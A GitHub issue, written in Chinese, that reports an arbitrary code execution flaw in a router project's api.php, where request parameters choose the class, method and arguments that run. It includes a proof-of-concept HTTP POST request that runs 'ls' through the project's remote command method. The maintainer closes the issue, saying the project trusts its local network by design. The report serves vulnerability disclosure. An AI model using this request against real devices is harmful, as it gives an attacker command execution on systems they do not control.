Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

安全问题-代码执行漏洞 #27

Closed
ly55521 opened this issue Oct 11, 2018 · 1 comment
Closed

安全问题-代码执行漏洞 #27

ly55521 opened this issue Oct 11, 2018 · 1 comment

Comments

@ly55521
Copy link

ly55521 commented Oct 11, 2018

在api.php中使用了eval函数,其他几个参数可控制导致任意代码执行。
$c = new $o();
$o = _GET("class",'unknow');
$f = _GET('function','unknow');
$agrs = implode(',',$_POST);
可以看出$o是一个对象,$c是$o对象的实例化,$f是对象的成员方法,$agrs是post传入的参数,也就是成员方法的参数。

poc:

POST /6/api.php?function=command&class=remote HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded

cc='ls'

跟踪执行流程,实际是执行了下面的代码,导致任意代码执行漏洞。
$c = new remote;
$j = $c->command('ls');

@qoli
Copy link
Owner

qoli commented Oct 11, 2018

此項目設計就只在路由器運行,受到局域網保護。
所以這裡設計允許了執行任意代碼。

除非你家小孩在你家 WI-FI 下惡意攻擊你。
當然,WI-FI 密碼洩漏而導致的攻擊是不在設計範圍之內。

@qoli qoli closed this as completed Oct 11, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants